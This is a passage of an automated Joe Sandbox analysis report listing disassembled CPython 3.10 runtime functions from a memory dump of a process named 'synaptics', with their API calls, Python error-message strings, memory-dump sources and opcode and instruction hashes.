                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Number_$Err_IndexSsize_tString
                                                                                                                                                                                                      • String ID: slice indices must be integers or None or have an __index__ method
                                                                                                                                                                                                      • API String ID: 863352641-4115508390
                                                                                                                                                                                                      • Opcode ID: 4c7859585b8968d43c200eb8a8a1ebc5a2a15fdb59ea723190c35be101ae051e
                                                                                                                                                                                                      • Instruction ID: cb57d41925aa88ee39a8eb477a210b72486b730c3aa50fbcc831b4084aaaf675
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c7859585b8968d43c200eb8a8a1ebc5a2a15fdb59ea723190c35be101ae051e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F090313012049BDB609E98AD40FD573E5AB4532EF108679F9188BF92C776E8A08B91
                                                                                                                                                                                                      Function 6C56EEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Python\getargs.c,0000056C), ref: 6C56EF4D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C56EF41
                                                                                                                                                                                                      • D:\a\1\s\Python\getargs.c, xrefs: 6C56EF3C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Python\getargs.c
                                                                                                                                                                                                      • API String ID: 376477240-2609708910
                                                                                                                                                                                                      • Opcode ID: ef9b13b4b9342bea514565e3b70b087b31617483a2f38e6743a10fbb5e029628
                                                                                                                                                                                                      • Instruction ID: fe7f639a2be733572ab289633d16ed690fbaba4261264d39f13283549b1e134f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef9b13b4b9342bea514565e3b70b087b31617483a2f38e6743a10fbb5e029628
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDF0AF72702209ABEF00DE56DC01F9B7BA4AB80709F108418F9149BD61C772E952CBE1
                                                                                                                                                                                                      Function 6C4A2E90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_Ready.PYTHON310(6C744240,?,?,?,?,?,?,?,00000000,?,6C473C07,00000000,00000000), ref: 6C4A2EB6
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(unhashable type: '%.200s',6C6E53DC,?,?,?,?,?,?,?,00000000,?,6C473C07,00000000,00000000), ref: 6C4A2EDA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • unhashable type: '%.200s', xrefs: 6C4A2ECF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatReadyType_
                                                                                                                                                                                                      • String ID: unhashable type: '%.200s'
                                                                                                                                                                                                      • API String ID: 32805604-1434970209
                                                                                                                                                                                                      • Opcode ID: 1f9030cc6d4bc576f5207ad89c12d49162f1dca3f82244d15ea4e5a4b86fbfe9
                                                                                                                                                                                                      • Instruction ID: f65ce9ec437462c9550dfb915eb361cad1b96643bdbf6f6fb04e7a34f0901998
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f9030cc6d4bc576f5207ad89c12d49162f1dca3f82244d15ea4e5a4b86fbfe9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0F0B436200100ABD7109AA7ED00E87B7A8BF9027AB044134E96CD3B51DB21F495D7D1
                                                                                                                                                                                                      Function 6C452F10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?,?,?,?,?,?,00000000,?,6C4530E1), ref: 6C452F2A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • issubclass() arg 1 must be a class, xrefs: 6C452F35
                                                                                                                                                                                                      • issubclass() arg 2 must be a class, a tuple of classes, or a union, xrefs: 6C452F4C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: SubtypeType_
                                                                                                                                                                                                      • String ID: issubclass() arg 1 must be a class$issubclass() arg 2 must be a class, a tuple of classes, or a union
                                                                                                                                                                                                      • API String ID: 2891779845-1136174045
                                                                                                                                                                                                      • Opcode ID: 5ee3cdeff382d85242df03cfd0e54928fd04479b2568df98c1360aedb0e96fc7
                                                                                                                                                                                                      • Instruction ID: 7b3f974d6e78aa63b06d25b4ad45e8eaeb4ccc038ba6b150ad6685de2c203d69
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ee3cdeff382d85242df03cfd0e54928fd04479b2568df98c1360aedb0e96fc7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0B43630551147C624C918B508F5AB6DA8BC5226F95413FE428C6F40DF34D8A792A0
                                                                                                                                                                                                      Function 6C54FEB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyNumber_AsSsize_t.PYTHON310(?,00000000), ref: 6C54FED3
                                                                                                                                                                                                        • Part of subcall function 6C450FB0: _PyNumber_Index.PYTHON310(?,?,?,6C44EED1), ref: 6C450FB7
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,slice indices must be integers or have an __index__ method), ref: 6C54FF01
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • slice indices must be integers or have an __index__ method, xrefs: 6C54FEF5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Number_$Err_IndexSsize_tString
                                                                                                                                                                                                      • String ID: slice indices must be integers or have an __index__ method
                                                                                                                                                                                                      • API String ID: 863352641-1579900357
                                                                                                                                                                                                      • Opcode ID: 2146a0479ca51be7244addbcc803fb149733465a843c7f301db5a2a14ef10031
                                                                                                                                                                                                      • Instruction ID: d063135a220eff8d629882d36d8f2644c0d7778ac165b91bccc2990bdc7f1a9e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2146a0479ca51be7244addbcc803fb149733465a843c7f301db5a2a14ef10031
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF0BE31300305AFCB108A6CED00FD573E8AB4532EF10826AF51887F82D775E8908BA1
                                                                                                                                                                                                      Function 6C46CF90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\codeobject.c,00000514), ref: 6C46CFBA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C46CFAE
                                                                                                                                                                                                      • D:\a\1\s\Objects\codeobject.c, xrefs: 6C46CFA9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\codeobject.c
                                                                                                                                                                                                      • API String ID: 376477240-2876071409
                                                                                                                                                                                                      • Opcode ID: 3b467268692a2e9303b8087133f69beb05be0214485155bd28b323f53b4aea1d
                                                                                                                                                                                                      • Instruction ID: 000957c3863022a66dd41264a5e5efd1fca823117372471711846c39d39ecf58
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b467268692a2e9303b8087133f69beb05be0214485155bd28b323f53b4aea1d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF01D7230420DDFDF08DF65D941E5A37A4AB4531AB014569F91CCBFA1DB30D810CB64
                                                                                                                                                                                                      Function 6C450450 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 6C44FF10: PyType_IsSubtype.PYTHON310(?,?,?,?,?,?,?,6C450266,0000003C), ref: 6C44FF58
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(unsupported operand type(s) for %.100s: '%.100s' and '%.100s',divmod(),?,?), ref: 6C4504A0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • divmod(), xrefs: 6C450490
                                                                                                                                                                                                      • unsupported operand type(s) for %.100s: '%.100s' and '%.100s', xrefs: 6C450495
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatSubtypeType_
                                                                                                                                                                                                      • String ID: divmod()$unsupported operand type(s) for %.100s: '%.100s' and '%.100s'
                                                                                                                                                                                                      • API String ID: 2789853835-4006302392
                                                                                                                                                                                                      • Opcode ID: 76ac6278678c69541c3d17e6cd33c337fd8f0e706967b88a27b3ad22a731fbf8
                                                                                                                                                                                                      • Instruction ID: 3935870c47b3bb45116c0420b924abe3752a17f5cbae8eb9bb6c2c8083e5cc44
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76ac6278678c69541c3d17e6cd33c337fd8f0e706967b88a27b3ad22a731fbf8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F0B476700100ABDA008B99EC00C86B7E6EF8533DB058575F919CBB61D672EC62CBD1
                                                                                                                                                                                                      Function 6C582BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyNumber_AsSsize_t.PYTHON310(?), ref: 6C582C07
                                                                                                                                                                                                        • Part of subcall function 6C450FB0: _PyNumber_Index.PYTHON310(?,?,?,6C44EED1), ref: 6C450FB7
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(argument should be integer or None, not '%.200s',?), ref: 6C582C3C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • argument should be integer or None, not '%.200s', xrefs: 6C582C31
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Number_$Err_FormatIndexSsize_t
                                                                                                                                                                                                      • String ID: argument should be integer or None, not '%.200s'
                                                                                                                                                                                                      • API String ID: 939530772-1111530202
                                                                                                                                                                                                      • Opcode ID: e69d834edf5fc0ceb35b310d5b777f6ad450a639797b5030e471964f4ea5221c
                                                                                                                                                                                                      • Instruction ID: d4ac044012aa23f1764664787a04bbee0c25e327f7b308f9e795b0370ff0cab7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e69d834edf5fc0ceb35b310d5b777f6ad450a639797b5030e471964f4ea5221c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57F0B434702208AFCB158E54DE49BA57BE2EB9431DF508578E41CCBFA0CB32E895CB81
                                                                                                                                                                                                      Function 6C56DCC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_snprintf.PYTHON310(?,?,%.100s,(impossible<bad format char>),?,00000000,00000000), ref: 6C56ED09
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: S_snprintf
                                                                                                                                                                                                      • String ID: %.100s$(impossible<bad format char>)
                                                                                                                                                                                                      • API String ID: 2260853251-3071225126
                                                                                                                                                                                                      • Opcode ID: 23514d59e382376e29651bb3b5f7db006deb9da310d8c9076a9365db4ba13f8c
                                                                                                                                                                                                      • Instruction ID: 272a37513fe661bd1a0d2444ebb35408522e5eddafd844e80f16abbb30862235
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23514d59e382376e29651bb3b5f7db006deb9da310d8c9076a9365db4ba13f8c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF02732605068AB8700AE9DACC0CBBBBF9DE4625570400EAF904D7211C2615E1487E2
                                                                                                                                                                                                      Function 6C4739D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,000005D2), ref: 6C4739FD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C4739EC
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4739F1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 376477240-1848062838
                                                                                                                                                                                                      • Opcode ID: eb1c89b68f94ef61595358d0ac695a392440a2ad6315b3be354970000f54dfc9
